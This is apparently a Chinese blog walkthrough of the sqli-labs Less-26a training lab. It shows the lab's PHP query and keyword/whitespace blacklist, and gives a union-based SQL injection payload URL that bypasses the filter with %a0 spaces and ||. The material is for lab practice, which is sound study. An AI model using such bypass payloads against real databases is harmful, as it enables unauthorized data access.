sqli-labs ————less -26a
Less-26a
檢視一下原始碼:
查詢語句:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}這一關與26關的區別在於,這一關中的SQL語句在構建的時候新增了一個括號,同時在SQL語句執行丟擲錯誤後並不在前臺頁面輸出。所以這裡報錯注入直接排除,不可以使用,但是我們可以使用聯合查詢。
這裡我們可以使用')來閉合前面的(',之後在後面加入自己構造的SQL隱碼攻擊語句,同時在最後仍然需要閉合後面的')才可以,在這個過程中我們仍然需要繞過過濾機制,至於繞過的方法在上一節中已經有所說明了,這裡不再重複了,下面給出一個簡易payload:
http://192.168.11.136/sqli-labs/Less-26a?id=1')union%a0select%a01,user(),3||('1
相關文章
- Sqli-Labs:Less2-Less4SQL
- less-12 in sqli-labsSQL
- sqli-labs————Less-52SQL
- sqli-labs————Less-53SQL
- sqli-labs————Less-55SQL
- sqli-labs————Less-56SQL
- sqli-labs————Less-57SQL
- sqli-labs————Less-58SQL
- sqli-labs————Less-59SQL
- sqli-labs————Less-28SQL
- sqli-labs————less-28aSQL
- sqli-labs————Less-29SQL
- sqli-labs————Less-30SQL
- sqli-labs————Less-31SQL
- sqli-labs————Less-32SQL
- sqli-labs————Less-33SQL
- sqli-Labs————less-35SQL
- sqli-Labs————less-36SQL
- sqli-Labs————less-37SQL
- sqli-Labs————less-38SQL
- sqli-Labs————less-39SQL
- sqli-Labs————less-40SQL
- sqli-Labs————less-41SQL
- sqli-Labs————less-42SQL
- sqli-Labs————less-43SQL
- sqli-Labs————less-44SQL
- sqli-Labs————less-45SQL
- sqli-labs————Less-48SQL
- sqli-labs————Less-49SQL
- sqli-labs————Less-51SQL
- sqli-labs————Less-60-65SQL
- Sqli-labs之Less1-10SQL
- sqli-labs Less 2-6 攻略SQL
- sqli-labs————Less-26(繞空格、/*、#等)SQL
- sqli-labs————Less-50(order by stacked injection)SQL
- sqli-labs ————less -27(union、SELECT、繞過濾)SQL
- sqli-Labs————less-46(order by 之後的注入)SQL
- sqli-labs ————less -27a(union、SELECT、繞過濾)SQL